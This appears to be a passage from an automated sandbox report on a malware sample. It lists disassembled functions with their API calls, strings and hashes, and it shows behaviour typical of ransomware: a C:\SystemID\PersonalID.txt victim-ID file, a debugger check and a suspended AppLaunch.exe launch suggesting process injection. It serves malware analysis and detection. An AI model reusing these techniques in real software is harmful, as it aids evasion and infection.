Part of subcall function 004111C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 0041120F
Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00411228
Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000), ref: 0041123D
Part of subcall function 004111C0: MoveFileW.KERNEL32(?,?), ref: 00411277

Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
Part of subcall function 0041BA10: RegisterClassExW.USER32(00000030), ref: 0041BA73

Part of subcall function 0041BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD

GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
TranslateMessage.USER32(?), ref: 0041B4CD
DispatchMessageW.USER32(?), ref: 0041B4D7

Strings

I:\5d2860c89d774.jpg, xrefs: 0041B32F
%username%, xrefs: 0041B283

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
String ID: %username%$I:\5d2860c89d774.jpg
API String ID: 441990211-897913220
Opcode ID: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
Opcode Fuzzy Hash: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96

Uniqueness

Uniqueness Score: -1.00%

Function 004516A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON

Download Yara Rule

Strings

unknown, xrefs: 0045175D
.\crypto\err\err.c, xrefs: 004516A5, 004516C4, 004516DB, 004516EE, 0045170D, 00451777

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID:
String ID: .\crypto\err\err.c$unknown
API String ID: 0-565200744
Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E

Uniqueness

Uniqueness Score: -1.00%

Function 00424168 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042419D
IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252

Strings

i;B, xrefs: 00424168

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: DebuggerPresent_memset
String ID: i;B
API String ID: 2328436684-472376889
Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59

Uniqueness

Uniqueness Score: -1.00%

Function 0042A77E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
___raise_securityfailure.LIBCMT ref: 0042AC7A

Strings

8Q, xrefs: 0042AC75

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 8Q
API String ID: 3761405300-2096853525
Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45

Uniqueness

Uniqueness Score: -1.00%

Function 00413C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0

Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64

_memset.LIBCMT ref: 00413C83

Strings

vector<T> too long, xrefs: 00413C96

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
String ID: vector<T> too long
API String ID: 1327501947-3788999226
Opcode ID: becb2cdbdaf91c6e493cd4a1f417c70dad3704a6b158ee89933a434d4ef8b073
Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
Opcode Fuzzy Hash: becb2cdbdaf91c6e493cd4a1f417c70dad3704a6b158ee89933a434d4ef8b073
Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C919 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
_fputws.LIBCMT ref: 0040C9C6
_fputws.LIBCMT ref: 0040C9E8
_fputws.LIBCMT ref: 0040C9F3

Strings

C:\SystemID\PersonalID.txt, xrefs: 0040C956
C:\SystemID, xrefs: 0040C946

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: _fputws$CreateDirectory
String ID: C:\SystemID$C:\SystemID\PersonalID.txt
API String ID: 2590308727-54166481
Opcode ID: 15efe7b0d4d7874f7dd22875512a907af6cda9244190f26b3c782714bcca198f
Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
Opcode Fuzzy Hash: 15efe7b0d4d7874f7dd22875512a907af6cda9244190f26b3c782714bcca198f
Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA

Uniqueness

Uniqueness Score: -1.00%

Function 00420DB3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00420DD5
__calloc_crt.LIBCMT ref: 00420DEE

Strings

Assertion failed: %s, file %s, line %d, xrefs: 00420E13

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: __calloc_crt
String ID: Assertion failed: %s, file %s, line %d
API String ID: 3494438863-969893948
Opcode ID: be179981483ea79c86a90cda97321d43c4b737f9f261ed9966cad45851319613
Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
Opcode Fuzzy Hash: be179981483ea79c86a90cda97321d43c4b737f9f261ed9966cad45851319613
Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699

Uniqueness

Uniqueness Score: -1.00%

Function 00480620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00480686

Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18

Strings

ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
.\crypto\evp\digest.c, xrefs: 00480638

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: _memset_raise
String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
API String ID: 1484197835-3867593797
Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99

Uniqueness

Uniqueness Score: -1.00%

Function 0044F23E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0044F251

Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15

__CxxThrowException@8.LIBCMT ref: 0044F266

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

Strings

TeM, xrefs: 0044F25B, 0044F247

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
String ID: TeM
API String ID: 757275642-2215902641
Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: A079.exePID: 6364, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	113
Total number of Limit Nodes:	15

Executed Functions

Function 005B2D10 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 252
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 005B2DED

Strings

mework\v4.0.30319\AppLaunch.exe, xrefs: 005B2DBF
D, xrefs: 005B2D94
C:\Windows\Microsoft.NET\Fra, xrefs: 005B2DB3

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: CreateProcess
String ID: C:\Windows\Microsoft.NET\Fra$D$mework\v4.0.30319\AppLaunch.exe
API String ID: 963392458-2438516953
Opcode ID: 867231e35514df1e9f9f9d7e13c175872b03ea9048bc92512d4b187d935f66e4
Instruction ID: 18f490164fde990dba42527f0446e69c98c7bbd2757c980d0df80253eaa304c4
Opcode Fuzzy Hash: 867231e35514df1e9f9f9d7e13c175872b03ea9048bc92512d4b187d935f66e4
Instruction Fuzzy Hash: C6A12AB1E002089FDB14DFE4CC85FADBBB5BF88304F644259E605AB286D771A946CB64

Uniqueness

Uniqueness Score: -1.00%

Function 005B62B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

FreeConsole, xrefs: 005B634F

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID:
String ID: FreeConsole
API String ID: 0-1307276421
Opcode ID: 3ad25e03d823417a5fd72a83060d0fd0b0780835288fb0cb08532fcca18374a3
Instruction ID: e7dc49522d58ced4f83eca5911593e909c0551852558cabeb27380d51022f5b4
Opcode Fuzzy Hash: 3ad25e03d823417a5fd72a83060d0fd0b0780835288fb0cb08532fcca18374a3
Instruction Fuzzy Hash: 46215A7091020AAFCB04EFAADC869EDBBB4BF99300F404619E412731A1EF346A44DF50

Uniqueness

Uniqueness Score: -1.00%

Function 0063C8D2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32(0000FDE9,?), ref: 0063C904

Strings

, xrefs: 0063C949

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: f46aa39fd05b77c3a8c318cc188f1b50b0bc309c95799665990745bee31160f2
Instruction ID: 023ab0ad642d73177c3a169df20e7e209941c2ed8294359f20e52c45c65320d2
Opcode Fuzzy Hash: f46aa39fd05b77c3a8c318cc188f1b50b0bc309c95799665990745bee31160f2
Instruction Fuzzy Hash: 93515EB150415C9EDB21CA28CC84BE67BBDEB56314F2441EDF09AE7182D3309D46CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00632AE3 Relevance: 3.2, APIs: 2, Instructions: 191
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00631FA9: GetConsoleOutputCP.KERNEL32(AB4A1677), ref: 0063200C

WriteFile.KERNEL32(?,?,?,00000000,00000000), ref: 00632C4C
GetLastError.KERNEL32 ref: 00632C56

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: 9f2904e17487d369412ec966df45bdd8b9430582867713520a5a22d768775b7d
Instruction ID: 2228e1408e1c87ee68ce8e8d44c4ab059050ce11a53a0abe97a66a3162278fa0
Opcode Fuzzy Hash: 9f2904e17487d369412ec966df45bdd8b9430582867713520a5a22d768775b7d
Instruction Fuzzy Hash: 7F61A6B1D0424AAFDF55CFA8C894EEEBBBAAF49308F144145E805B7252D375D942CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0063CE42 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0063C7A7: GetOEMCP.KERNEL32(00000000), ref: 0063C7D2

IsValidCodePage.KERNEL32(-00000030), ref: 0063CEA3
GetCPInfo.KERNEL32(00000000,?), ref: 0063CEE5

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: feda24677c9dcb117410a5e3e716e30d5bb2ac15173cf2cc5aff8cb9dc9490ba
Instruction ID: bc6a6cbbd746485374cb0e25d06d30faa255ad9e8493c99f6b3d0f5ed0f480c2
Opcode Fuzzy Hash: feda24677c9dcb117410a5e3e716e30d5bb2ac15173cf2cc5aff8cb9dc9490ba
Instruction Fuzzy Hash: 385104B0A002459EDB20CF75C884AEABBF7EF85324F14856EF086A7251D7749A46CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0063258E Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 0063262A
GetLastError.KERNEL32 ref: 00632650

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: b04041c6f9c8a6d7fc4dc21a2a36336781bb2ed10306beed5565d89dff88be8f
Instruction ID: dbfa31b52d3bcba60071121823ac5168cede6453109cdad93214abe004df2e3d
Opcode Fuzzy Hash: b04041c6f9c8a6d7fc4dc21a2a36336781bb2ed10306beed5565d89dff88be8f
Instruction Fuzzy Hash: FE218074A0021A9FCB15CF29DC909DDB7FAEF89301F2441A9E906D7211D630DE82CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 006314AD Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,006315BA,0066FFE8,0000000C), ref: 006314F9
GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,006315BA,0066FFE8,0000000C), ref: 0063150B

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 874a6b849f75936a13b1946d527cebadea0447ec08ff725eedc5e2fa299f5730
Instruction ID: f695c23116c67c8ab1632d977625c70259538aa8b83f58375a4b9bb6caee1bc0
Opcode Fuzzy Hash: 874a6b849f75936a13b1946d527cebadea0447ec08ff725eedc5e2fa299f5730
Instruction Fuzzy Hash: 2B1175B11047514AC7304B3E9C886666AD7A797330F38071AD4B7CB3F2C734D8879681

Uniqueness

Uniqueness Score: -1.00%

Function 0062EC4A Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,00630F9C,?,?,00000000,?,00000000,00000000,00000000), ref: 0062EC7E
LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?), ref: 0062EC9C

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
